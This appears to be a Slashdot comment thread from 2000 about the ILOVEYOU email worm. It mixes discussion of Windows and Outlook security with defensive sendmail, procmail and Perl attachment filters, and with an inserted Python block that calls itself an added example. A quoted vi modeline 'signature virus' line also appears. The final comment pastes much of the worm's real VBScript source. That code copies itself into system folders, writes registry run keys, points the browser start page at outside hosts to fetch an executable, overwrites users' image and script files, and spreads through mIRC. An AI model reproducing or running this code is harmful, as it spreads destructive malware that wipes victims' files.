Though I don't have any pressing need to throw the above together and document what I did. Ideally, you would want to combine the above method with one of the several anti-evil-stuff procmail filters on freshmeat.net...
I work for a medium sized company, I didn't receive a single virus on my corporate email account.
However I did receive an ILOVEYOU on the first day that I knew it was out... Someone at the company I buy computer parts from received one and executed it, that instance was fairly controlled, however it got to the head of wholesales, and he also executed it. I was on his email list, lucky me.
We received a few at the company, it didn't get spread because no one here ran it because we (the IS dept) have made them too scared of viruses over the years.
Devil Ducky
MY peers would get out of jury duty.
That's true, and that could happen on ANY OS I know of (well, OS/390 being an exception), so I guess it really boils down to the user and how well educated he/she is about such matters. Unfortunately (I believe) Windows attempts to dumb down users while Linux has the opposite effect. I also don't buy that Windows is more productive, it all comes down (again) to the user and what they learn. Windows IS however, less secure.
Finkployd
Imagine all the fun they'd have reporting that? MSNBC news: The MSNBC virus is wreaking havoc on the world's computers! We didn't do it, honest! *grin*
-subtraho
The real problem here with these kinds of things isn't just Outlook. Or just moronic users.
The whole security system in Win9x is flawed. Windows9x was never intended to be on a network. Win98 is just a rehashed version of Win95, which is just a rehashed Win 3.1. Single user OS's that had "root" access everywhere were fine in the early and mid '90s. That's not the case anymore. Now that everyone is hooked up to the internet, other people have access to these single-user OS's such as Win9x. It didn't matter that you had "root" back in the day; you were the only one using the system. Now many people can run code on your computer, be it a vbs, java, etc.
A *nix variant doesn't have this problem. Unix was designed with networks and network security in mind for over 30+ years. I couldn't, if I tried, screw up my system like these vbs files do to Windows computers.
Even Win2k security is lax. For instance, how many times does a typical linux install (be it Redhat, Debian, or anything else) go "DON'T USE ROOT AS A USER!" and forces you to make a regular user account? Now look at Win2k's installation, that gives you your user name with admin. privs.
If Microsoft really wants to stop stuff like this, they need to update their entire network security model to the 21st century....or at least the 1970's. Windows9x was not designed to be on a network. That's the reason it has no security. "access zones" and what have you in programs like Outlook are just a cheap hack to hide the real problem of the Windows security model. The problem being, it wasn't designed to have one.
Wouldn't a .txt file have a different icon than a .vbs file? Although, still, it's rather confusing to people to think that stuff is hidden when they think they can see it(I saw ".txt". not ".vbs".) Maybe someone should put out a "virus" to change the default icon for .vbs files to a skull and crossbones? That would be harder for people to instinctively open. (AAAGH!! Poison!!! Delete delete delete!!!)
Withdrawal before climax is very ineffective and those who try this are usually called "parents."
I was thinking of a hypothetical virus in the shower this morning.
Geez! People like you is what gives a bad name to showers.
Men with no respect for life must never be allowed to control the ultimate instruments of death.
GW Bu
So, let us go for a little thought experiment here: Suppose somebody finds out that some files should be deleted regularly. Personally, I would find that useful. Some large files, such as Postscript files (most of my large PS files are generated from raw (La)TeX files anyway), core-dumps, etc. should be deleted when they are n days old. Useful stuff. OK, so, let us postulate that there exists somebody who could write this in VBScript and make it work. Great. Well, this guy forwards it to somebody else who thinks it is useful, and who has a small disk and thinks that n=1, in other words certain files should be deleted every day.
Now, at the other end of the world sits a geek who has not yet realized it, but given some fortunate circumstances (e.g. education) could become a hacker. This guy has written a script to send his friends pieces of VBScript code that he writes and install it on his friends' computers. I mean, that would be nice and unselfish.
Now, the next thing that happens is that these two programs meet, and merge.... Given that not everybody involved is particularly clued, it might well become a worm...
So what's the point of all this? Well, in an unfortunate case, some well-meaning, but not very competent programmers may create a worm like the ones we have just seen by accident, and the moral is, the more stupid your users are, the more you need to make sure they don't hurt themselves and the others.
M$ is more like "so, you would like to shoot yourself in the foot? Really bad? Sure, for only $29.95, we will give you a gun, and point it at your foot for you, the only thing you would have to do yourself, is pull the trigger. Don't worry, we'll show you where it is."
Employee of Inrupt, Project Release Manager and Community Manager for Solid
I haven't tried this but it was posted on comp.mail.sendmail after the original Love Bug. I'd actually like to try it, but I know so little about sendmail that I'm unsure as to how to apply it - anyone enlighten me?
# TURN ON CONTENT-TYPE MATCHES: uncomment lines as instructed.
Kquotetoplus dequote -s+
HContent-Type: $>CheckContent
## By Mike Schwager. http://www.enteract.com/~schwager
## http://www.schwager.com schwager@enteract.com
## INSTRUCTIONS:
## Uncomment 1 (or more) of the following ChkPat lines. Add new ChkPat
## lines if necessary, as given in the examples. Change the MIME-type
## (eg, from application / octet-stream to application / ms-word )
## if you need to, and change the name and/or file extension.
## For each pattern line, there should be a matching rule under SCheckContent.
## Do not include double quotes in the pattern line! They will be replaced
## with plus ("+") signs.
## Uncomment the SCheckContent line.
## Uncomment the appropriate rule(s).
## Change the rule(s) to use the message that you want.
## Change the message(s) as appropriate. Add new messages as appropriate.
## Watch your tabs!
D{ChkPrfx}application / octet-stream ; name=
# Here are your patterns
D{ChkPat1}.vbs
#D{ChkPat2}.exe
#D{ChkPat3}wordvirus.doc
# Here are your messages
D{ChkMsg1}REJECT- This message may contain a virus in the attached script.
D{ChkMsg2}REJECT- This message has a virus. -MS
SCheckContent
R$*name=$* $: $1 name= . $2
R$* $: $(quotetoplus $1 $)
R${ChkPrfx} $* $: $1
# Using these lines as a guide, match patterns; include messages
# only the character in front of "$#" should be a tab. Don't forget the tab!!
R $* ${ChkPat1} $* $# error $@ 5.7.1 $: 553 ${ChkMsg1}
#R $* ${ChkPat2} $* $# error $@ 5.7.1 $: 553 ${ChkMsg2}
#R $* ${ChkPat3} $* $# error $@ 5.7.1 $: 553 ${ChkMsg1}
## END CONTENT-TYPE
Macintrash files have, in fact, two invisible 4-character extensions.
The filetype -- it contains the file type which says what kind of data is in the file.
The creator -- which identifies the application that created the file, and which should be used to work with the file.
Applications have a file type of 'APPL' and the creator field identifies the application; that is, it is what ends up in the "creator" field of files generated by this application.
Additional trivia: Beige toaster files are, in fact, divided in two. There is a data fork, and a resource fork. The resource fork contains information that can be easily edited by a resource editor program, allowing one to change certain aspects of, say, an executable file, like the icons, fonts, sounds and strings it uses. The data fork contains, well... (drum roll) data... (In the case of an APPLication, it is the actual binary code. GUI details are in the resource fork). Either (or both) of those forks can be of zero length.
It is not a bad system, except that it is totally shielded from lusers and, although it can prevent them from doing mayhem on their filesystems, it is a royal pain in the ass to change if you don't have the proper utilities.
I suppose it could be desirable to have a filesystem that allows you to have as many forks on your files as you want (did I hear somewhere that Windoze NT has something like that? Or is it Novell?), but in my opinion, nothing beats the simplicity of a "flat file" filesystem such as we enjoy so much on Linux.
However, I still don't dislike the concept of embedding file type information and whatnot within the directory entry/fdn.
--
Here's my mirror
-Erf C.
Cthulu always calls collect...
You can't possibly consider a virus writer to be an artist? I'm sure that some of code they produce is elegant, or at least quite advanced and technical. But to call the result of that work 'art' is just fallacy.
Unfortunately, destruction is creative.
-- iCEBaLM
Hi all,
I have been dismayed at the media's recent coverage of the "love bug" and its new variant - which is being reported on today.
In particular I have been seriously disappointed by the BBC's inappropriate coverage of the prerequisite conditions for this "virus" to operate.
1). A computer system running a recent Microsoft windows operating system is required.
2). The user must use the Microsoft Outlook e-mail client.
3). The user must have the Windows Scripting Host (WSH) installed.
This so called virus only affects a small percentage of computer users and the media needs to point this out. Microsoft have taken the wrong course of corrective action - as usual.
I have telephoned the BBC this evening with regard to this - if you are a reporter from the BBC reading this, please contact me personally for any further clarification required.
--
Jonathan.
http://www.jonmasters.org/
This is a quickie script to straighten out VBA, VBS, and JS attachments. Happy Hacking:
#This goes in procmailrc:
:0 Bf
* !^X-Loop: viruscheck
* ^Content-Disposition:.+
| /sbin/noiloveyou | /usr/bin/formail -i "X-Loop: viruscheck"

:0:
$ORGMAIL

#!/usr/bin/perl
#This is "/sbin/noiloveyou"
# Read the message line by line and copy it to stdout, rewriting the
# MIME headers that name a script attachment.
while (<STDIN>) {
    $temp = $_;
    # A Content-Disposition header: print it, then rewrite the file name
    # on the following line so foo.vbs becomes foo_vbs.txt.
    if ($temp =~ /^content-disposition\:/i) {
        print $temp;
        $temp = <STDIN>;
        $temp =~ s/\.vbs/_vbs\.txt/i;
        $temp =~ s/\.vba/_vba\.txt/i;
        $temp =~ s/\.js/_js\.txt/i;
        print $temp;
        next;
    }
    # A Content-Type header: relabel JavaScript as plain text, then
    # rewrite the name parameter on the following line the same way.
    if ($temp =~ /^content-type\:/i) {
        $temp =~ s/application\/x-javascript/text\/plain; charset\=us-ascii/;
        print $temp;
        $temp = <STDIN>;
        $temp =~ s/\.vbs/_vbs\.txt/i;
        $temp =~ s/\.vba/_vba\.txt/i;
        $temp =~ s/\.js/_js\.txt/i;
        print $temp;
        next;
    }
    print $temp;
}
#This should at least slow it down a little bit....
# Jacques Richer -- jricher@bankri.com
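The same gateway-side neutralisation as the procmail/Perl filter above, the sendmail mailertable/procmail sketch and the sendmail Content-Type rules earlier in the thread, written as an added Python example (it is not code from any poster): it parses a constructed MIME message, flags attachments whose final extension is one of the script types named in this thread, produces the 553 rejection text a reject rule would return, and rewrites the part's headers to a harmless name and text/plain. All addresses, names and payloads are constructed.

```python
"""Gateway-side neutralisation of script attachments (added example).

Same idea as the procmail/Perl filter and the sendmail Content-Type rules
posted in this thread: find attachments whose file name carries a script
extension, then either reject the message or relabel the part so that no
mail client will execute it.  All sample data below is constructed.
"""
import base64
import email
from email import policy

# Extensions called out in this thread (.vbs/.vba/.js from the Perl script,
# .exe from the sendmail rules, the rest from the later warning list).
SCRIPT_EXTENSIONS = {
    ".vbs", ".vba", ".js", ".jse", ".wsf", ".exe",
    ".scr", ".lnk", ".reg", ".hta",
}

# Constructed placeholder payload; it is not script code.
_PLACEHOLDER = base64.b64encode(b"constructed placeholder bytes\n").decode()

# Constructed sample: a double-extension attachment, the trick the thread
# discusses (the user sees ".TXT", the mail client acts on ".vbs").
SAMPLE_MESSAGE = f"""\
From: alice@example.com
To: bob@example.com
Subject: ILOVEYOU
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="XYZ"

--XYZ
Content-Type: text/plain; charset=us-ascii

constructed body text
--XYZ
Content-Type: application/octet-stream; name="LOVE-LETTER-FOR-YOU.TXT.vbs"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="LOVE-LETTER-FOR-YOU.TXT.vbs"

{_PLACEHOLDER}
--XYZ
Content-Type: image/jpeg; name="photo.jpg"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="photo.jpg"

/9j/4AAQ
--XYZ--
"""


def parse(raw):
    """Parse raw message text into an EmailMessage tree."""
    return email.message_from_string(raw, policy=policy.default)


def script_extension(filename):
    """Return the lower-cased final extension if it is a script type, else None.

    Only the last extension counts: "LOVE-LETTER-FOR-YOU.TXT.vbs" is caught,
    "notes.vbs.txt" is not.  (The posted sendmail pattern matches ".vbs"
    anywhere in the name, which is stricter but also hits harmless names.)
    """
    if not filename:
        return None
    name = filename.strip().lower()
    dot = name.rfind(".")
    if dot < 0:
        return None
    ext = name[dot:]
    return ext if ext in SCRIPT_EXTENSIONS else None


def find_script_attachments(msg):
    """List (filename, extension) for every leaf part carrying a script name."""
    hits = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        ext = script_extension(part.get_filename())
        if ext:
            hits.append((part.get_filename(), ext))
    return hits


def rejection_line(msg):
    """SMTP reply text a reject rule would return, or None to accept."""
    hits = find_script_attachments(msg)
    if not hits:
        return None
    names = ", ".join(name for name, _ in hits)
    return f"553 5.7.1 REJECT- This message may contain a virus in the attached script ({names})."


def defang(msg):
    """Relabel script attachments in place, as the Perl filter does.

    foo.vbs becomes foo_vbs.txt and the part is declared text/plain; the
    payload bytes are left alone, only the executable labelling is removed.
    Returns [(old_name, new_name), ...].
    """
    renamed = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        old = part.get_filename()
        ext = script_extension(old)
        if not ext:
            continue
        new = old.strip()[:-len(ext)] + "_" + ext[1:] + ".txt"
        part.replace_header("Content-Type", "text/plain; charset=us-ascii")
        part.set_param("name", new, header="Content-Type")
        if "Content-Disposition" in part:
            part.set_param("filename", new, header="Content-Disposition")
        renamed.append((old, new))
    return renamed


if __name__ == "__main__":
    m = parse(SAMPLE_MESSAGE)
    print(rejection_line(m))
    print(defang(m))
    print(rejection_line(m))
```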
The icon is different, but most users wouldn't notice. The default icon for a VBS file is a document with a picture of a scroll on it (perhaps an ancient Greek "script"?), whereas the default icon for a text file is a document with some lines of text on them. The script doesn't look identical, but most users won't know the difference.
i wish that the *name* of the virus could be :-)
something that would be *very* embarrassing
to say on CNN or CSPAN...
It would need to be subtle (so that the embarrassing thing would be said enough times
to take hold
-fb Everything not expressly forbidden is now mandatory.
if the program was a .exe, the user would manually have to execute it. same if it was a UNIX binary. Yes, users are very stupid, and they will do this, but not to nearly the extent that the .vbs scripts get executed, because lookout automatically executes them... Hey, that makes me wonder... if the user associated the .vbs extension with say, notepad, would it automatically run it, or just run it in notepad? that may be something to try...
Think that was flamebait? You've obviously never met me in person...
$email=~tr/.@/
Because they CAN.
It's the same reason the jocks in my neighborhood put used bubblegum on all the crosswalk push-buttons: they won't be around to see someone suffer, and they're certainly not getting anything out of the experience, but they KNOW they're ruining someone's day, and that's enough.
It's the same reason teenagers pour acid on cars in random parking lots belonging to people they don't even know: they certainly won't see the people they've just caused thousands of dollars of damage to (in fact, if they DO see them, they've failed) - but nonetheless, the damage has been done.
It's the same reason people put cyanide into aspirin bottles at the supermarket: They have no clue who will get hit, but SOMEONE'S life is going to be ruined by their actions, and that's enough.
If this is the only means people have to demonstrate to themselves and to the universe that they matter, that their actions have had SOME effect on other people, then they'll do it. People need to believe that they matter, even if it's as monsters.
People do it because, fundamentally, it's FUN to screw the other guy over. There's an inherent human need to make other people worse than you - after all; life's effectively a zero-sum game, so making everyone else worse-off is just as effective as making yourself better-off, and oftentimes easier to do.
-Hentai [in vita non pacem est]
This was inevitable, the interesting thing about this virus is that it morphs as well as changing the subject, well according to this BBC report. What we need is a foolproof way of making users check what they are doing when they use their computer, to ensure all the files don't get deleted.....oh.....wait a minute, isn't that what Linux is for?
Win2k is in dumb mode by default. I'm still trying to figure out how to see extensions under Win2k. RTFM would probably solve this problem, but what fun would that be?
Another question: it can't be too hard to change the linking in Windoze for .vbs so they don't run at all (ie have them be considered text files). It seems strange that I have not seen instructions like "change this item in your Registry to fix all the virii." Is this change impossible, or perhaps it would break too many other programs, or what? How about a .vbs wrapper that pops up a question box (and maybe examines the code for stuff that reads/writes files or does anything with mail) before executing it?
No no no.. I'm not saying my friends are dumb, but in terms of computer-stuff some of them just know how to email people.
Many people I asked said they never got one.
It could be, we aren't connected by few degrees to the corporate world.. which seems to be the most hit with the virus =)
Yap. Shame the 'big guys' in the office (boss, VP of IT, or prez) make the decisions and sometimes are stubborn about it.
Now i'm wondering how many staunch MS people will switch from outlook to something like eudora, or netscape mail.
Oh well. I'll stick with pine, and if there is some pine vulnerability, i'll go to Elm. If Elm.. then.. i'll telnet to the sendmail port and do it in RAW mode. =)
Oh, and if i was head of a company, i'd switch everyone to RAW mode in that case =)))
Is if the virus/worm was one of these LookOut ones:
"MSNBC reports today that a virus by the name of 'MSNBC' is causing havoc on the net, overloading mail servers around the world. Only persons using MS Outlook can be infected."
I suppose I should thank MS for making me giggle several times a day. *giggles* -- See?
Akardam Out
"Hi Mr Bunny Wabbit!"
Certainly not this worm, which doesn't read any executables.
A real virus spreads by opening other executables and inserting its code into them. It most likely reads its own code from memory, not from disk... how would this prevent any virus activity?
1) People who don't use Outlook -and- Windows. The mail client, then, would be intelligent.
2) Intelligent *people* who may use that combo, but don't open those type of attachments, have turned off auto-open, etc.
The third group is people like me who haven't gotten the virus, no matter what OS & client they run.
Ceterum censeo Microsoftam esse delendam.
Pretty much Rob Rosenberger's theme at the Computer Virus Myths page. I post that here in case a few of you haven't discovered it.
Mambo dogface in the banana patch
I saw at least 15 slightly different variants of the last one, and they're just trickling off. And this one's a lot nastier than the last. If anyone gets a copy of the script, I'd love to see it... need to know if what I have in place to stop it will keep working with this one. (first post?)
Anyone that thinks Linux is immune from virii is a moron. These are just simple attachments that dumb people run on their machine.
:)
Yes, but no Unix mailer I've ever used executed attached scripts directly. If you want to run an attachment, you save it, chmod +x it, then run it. It takes a very deliberate effort, and even then it would be very hard for a script to propagate itself easily, given the numerous mailers used out there (netscape, pine, mutt, elm, exmh, etc). And its damage would be limited to the user's home directory: no risk to the system as a whole. And if they come running to you, crying and hoping to get their precious data back, you can laugh at them and say "Well, next time don't run executables people send you!" I like being a BOFH.
BEWARE! You may be the next victim of the latest variant of the ILOVEYOU worm, the "Honor System" worm.
This worm attacks users that were previously unaffected by the ILOVEYOU worms because either:
a) They were not running Microsoft Windows.
b) They were running Windows, but not Outlook.
c) They were running Windows and Outlook, but execution of .vbs attachments was disabled.
d) They were running Windows and Outlook and execution of .vbs attachments was not disabled, but the user was not stupid enough to open executable attachments to e-mail even after repeated warnings not to do so.
e) They were running Windows and Outlook and execution of .vbs attachments was not disabled, but none of the user's friends were dumb enough to have run the worm and send it to them in the first place.
Background:
Users across the globe have been affected by the spread of the so-called "ILOVEYOU" worm and its copy-cat variants. These worms rely on gaping security holes in the Microsoft Outlook e-mail client, as well as the incredible stupidity of users who open executable attachments without first detaching them and scanning for known viruses, despite repeated warnings not to do this.
IT departments have been scrambling to combat the spread of malicious e-mail attachment worms by setting up filtering at firewalls, updating anti-virus software, alerting users not to open e-mail attachments and even taking down mail servers in some cases as a defensive measure. Anti-virus companies like Symantec and McAfee are working round the clock to identify new strains of these worms and to develop countermeasures to identify and filter out these malicious e-mail attachments.
The US Congress is extremely concerned about the problem. The global e-commerce infrastructure is threatened by 14-year old hackers who can bring the entire internet to a halt by writing visual basic scripts which send themselves to other users and then corrupt users' computer files. Hearings have been held to determine the best way to combat this new menace. Clearly, it is these cyber-terrorist-vandals who are to blame, and not the security model of Microsoft's Office products. After all, why wouldn't you want to allow executable e-mail attachments to have free rein over any and all files on the user's computer?
Seeing that this problem is not the result of inferior software design, but in fact because of 14-year old hackers, it was a simple matter of time before someone developed a worm that was able to attack users who previously were not affected by the ILOVEYOU worms. The result is the "Honor System" worm. This new worm is far more destructive than its visual basic scripted cousins, as it does not rely on any Operating System or Application-specific vulnerability to spread itself and cause damage to users' computers. Instead, this new worm relies completely on the ability to socially-engineer the user into spreading the worm. Truly this is the work of evil 14-year old hackers at their worst.
How it works:
The user receives an email from someone they know with the following text:
This is the Honor System worm. Please forward
this message to everyone you know, then delete
a random selection of critically important files
from your system.
What to do:
This worm has the potential to be far more destructive than previous .vbs worms. This worm will spread itself through virtually every e-mail client capable of forwarding messages (so far the list includes Eudora, Pine, Netscape Messenger, Lotus Notes and Outlook). Additionally, this worm is capable of destroying files on virtually any Operating System that allows ordinary users to delete critical system files (ok, really this is only Windows and maybe MacOS). If you suspect you have received a copy of the Honor System worm:
DO NOT forward the message to anyone!
DO NOT delete any critical system files from your computer!
REPORT the attack to your system administrator immediately!
If you follow these instructions you can protect yourself from this latest malicious attack by 14-year-old hackers and help stop the spread of this insidious mutation of the ILOVEYOU worm that laid waste to most of the internet last week. Thank you.
There is much cruelty in the universe, John.
Yeah, we seem to have the tour map.
Do any virus writers read Slashdot? And if so, would any of you care to explain *why* you do it? Ignoring the simple macro viruses, some stuff, especially the polymorphic ones, are incredibly clever pieces of code. Why put that talent to waste?
Now weary traveller, rest your head. For just like me, you're utterly dead.
Someone will make another, more destructive, sneakier version of the trojan worm (hey, it's a trojan horse and a worm; the next version may be a virulent trojan worm...). They'll have VBSs that generate EXEs, and vice versa, they'll take the boot sector with a virus that can relaunch the worm, they'll display amusing animations (grabbed from who-cares-where) that make the infected user think he's received a typical funny/annoying attachment.
Windows system admins: batten down the hatches! Trap all attachments and personally filter them. Get the managers to enact a strict "no unnecessary attachment" rule. Delete all "amusing" attachments and Word documents that should have been plain text (or could have been as HTML in the body), and send a nasty letter to whoever sent it.
This is, to some degree, a stupid MS problem. There are things that could have made worms like this harder to spread. However, something similar to this could work in Linux, too, given a sufficiently large ignorant user base (though it might be harder to write). If the user is dumb enough to be tricked into running anything you send him, there's no technological fix for it.
There are three possible solutions: supervise the users (as suggested above), educate the users, or tie the users' hands, so they can't do anything but use a small set of applications and move around certain types of documents. The first is a prohibitively expensive short-term fix, the latter two are long-term solutions: the second is better, but perhaps unrealistic; the third can't be done with current software, a change to some operating environment is needed (tweaking a shell for Linux should do it, though perhaps a change to the kernel would be better: create a sub-user login that has the same sort of access to a single user account as a user can have to the root account with "sudo"; sort of a weak capabilities system). I think both of the latter two are needed: you need to tie new or casual users' hands so they can't do too much damage, and at the same time you need to gradually educate them to the point where you don't have to watch them anymore.
You can't just ignore user ignorance. You have to make them take the bus until they learn how to drive without causing a 30-car pileup, and give them a ride when the bus doesn't go where they are headed. Don't ignore that just because they whine that the bus is slower.
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
"male" ? Omg ! It's JeffK that's behind it !!!!
/. posts stories every day about corporations raping everything they can get their grubby little paws on. DMCA, UCITA ... and these are just GEEK issues.
This sort of thing can be considered a sort of direct action.
support gun control: take guns from cops
ah - I knew all that.
I just wanted to know if AppleScript could make Outlook its bitch as well as VBS does. In my dream world, where Macs have 50% marketshare, this type of TH might spread faster due to people not being able to easily distinguish between executable content or regular attachments, (by looking for the ".vbs" extension) if AppleScript (compiled) didn't have any visible means of identification (type; APPL).
Forks: Yes, a pain in the ass to edit resource forks if you don't have the proper tools. The proper tools are freely available on Apple's site, and most Mac compilers also ship with Res Edit, etc. The equivalent data on PCs are much more difficult to edit after the fact (resources in DLLs). OS X will use a different scheme, an application will actually be a special type of FOLDER, which contains the discrete files and resources. In Finder, this will still be hidden from the user, because that special folder will be unopenable. (I think there was a /. primer on this a few months back).
NT *does* indeed have something similar to forks, called streams on NTFS. Too FUCKING bad, nobody was smart enough to write a protocol that preserved Mac resource forks when copying them to an NTFS volume by putting them into a stream. You copy a Mac file to NTFS, and NT treats it the same way DOS 1.0 does, it blindly, stupidly, erases critical data. (so does Unix, and every other OS except Novell). Seems like an obvious idea. Streams have been around since NT 3.5, but they are not used for anything other than storing security attributes for files - which in other OSes, are stored as part of the file system, instead.
I'm in agreement with you about "flat file" systems, if only for universal interoperability purposes, and I think Apple is too, which is why they are abandoning it and going to the system they are for OS X - the Finder will keep users out of the dangerous areas, and treat application folders as files, which is great, IMHO, from a usability standpoint. For a power-user wanting to muck with things, use a special tool to get at them and edit them (like res-edit), or go in using the shell, duh! The command line still lets you get into those folders and see all the nifty contents. Things only an engineer could appreciate, should only be accessible to engineers. My mother in law doesn't need to open up an application folder, see ten million dlls and binaries (and subfolders), and try to figure out which one is the executable.
I just remembered this old Metallica song. . .
These are my friends, See how they glisten. See this one shine, how he smiles in the light.
http://www.hoe.nu/text/hoe-0935.txt
Thanks.
-Mogel
You need to warn end users of these other potential security holes in Windows. Files ending with:
.wsf - Windows script (can execute commands)
.lnk - execute program (can execute programs)
.scr - screen saver (full executable)
.reg - registry (can add, modify, or delete anything in user's registry)
.js - JavaScript
.jse - JavaScript
.hta - HTML application
What are you talking about, Micro$haft IS the main stream... ;-)
Fish
Some people have too much time. To take a virus that caused international panic among Outlook users, then upgrade it to do more damage while being more covert, is just messed up. Although I have to admit, it's funny. Which is a stupid way for an Outlook user to view it.
I think that Outlook has some good features outside of the sexy graphical interface. For one thing, it does what good programs should do- it automates simple, repetitious tasks without making you jump through hoops. Outlook collects email addresses that I reply to, so that if I need to write someone that I don't know the email address for off the top of my head, I have it without any work. Outlook also does a pretty good job of building several useful features into one program- the calendar, contact manager, task list, and mail client. Sometimes it is good to keep things like that separate, but in this case I have found it to be beneficial. It also connects with my Palm Pilot and syncs everything automatically, which is useful since I use both of them to keep track of things. And as for accessing email from anywhere, it's easy to just tell Outlook to leave your messages on the server. So when I am at home, I can use Outlook for whatever I want. When I'm elsewhere, I telnet into my unix account and read mail with pine. There's no need of only using one or the other. They both serve their purpose.
Found this on a mailing list I'm on... just thought it was relevant :)
--- START QUOTE ---
Years ago (after one of the first Word macro viruses came to my attention) I wrote a .signature virus that works for a very small set of Unix configurations.
If a person gets the virus, and they reply with the body quoted, and they use a "true" vi with modelines enabled, then the virus appends itself to ~/.signature. (The /usr/ucb/vi on the suns is a "true" vi; the panix /usr/bin/vi claims to be bug-for-bug compatible with a "true" vi, but does not allow modelines.)
vi:/virus!$/w >> .signature : Eli's vi modeline .signature virus!
I posted it to comp.editors and I remember someone writing an emacs equivalent.
Vi modelines are only effective if in the first or last five lines of a file. Some versions of vi insist on them being indented.
Elijah
--- END QUOTE ---
OK, got tired of waiting for someone to do this so I did it myself.... http://www.geocities.com/vbs_virus_protect/ Simple... Disable all VBS, JS, WSH, and HTA files by sending them to Notepad instead of executing them. If you need to run it you can do it from the command prompt.. Take a look... I have a .exe coming Monday. 8> -g
Personally, I use Pine on a 10,000 user unix machine.
I have YET to receive ANY of the 'vbs' email worms in any email I've ever received.
I'm on numerous email lists, with friends from all over, hence I'd expect to at least receive one.
I have not received any of the melissa, iloveyou, or variants.
Not a single one.
I can only assume I'm not alone, but if I and others are in the same situation, does this not mean that the virus isn't as widespread as people say it is?
IF it was, I think all us pine/elm/etc users should receive something... and get a good laugh.
Jesus, man, just point him to a dictionary site like dictionary.msn.com/find/entry.asp?search=virus where he can see the proper plural form within three seconds, rather than wallowing through that mental masturbatory dreck that Mr. Christiansen wrote. I hope he's not reading this, 'cause I'm not looking to offend him, but after skimming that page, I can see why people don't exactly consider Mr. Christiansen to be "well-liked."
Cheers,
ZicoKnows@hotmail.com
During the last couple of months, firms like ISS had a huge increase in sales. With the Love Bug and copycat viruses I'm sure the AV companies are also seeing increased profits. I wonder how much @stake consulting rates are for helping a firm defend against this sort of thing. I'm sure they're not cheap.
More race stuff in one place,
than any one place on the net.
Maybe the reason that dumb people can write devastating viruses is because they are dumb. Although I'm not suggesting that the writer of the infamous Internet Worm is dumb, his virus/worm was meant to be harmless and its devastating consequences happened by accident rather than by design.
The lameness filter doesn't like this...
rem barok -loveletter(vbe)
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Mic
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs"
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Mic
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerh
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflf
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGR
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklN
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eqfolderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
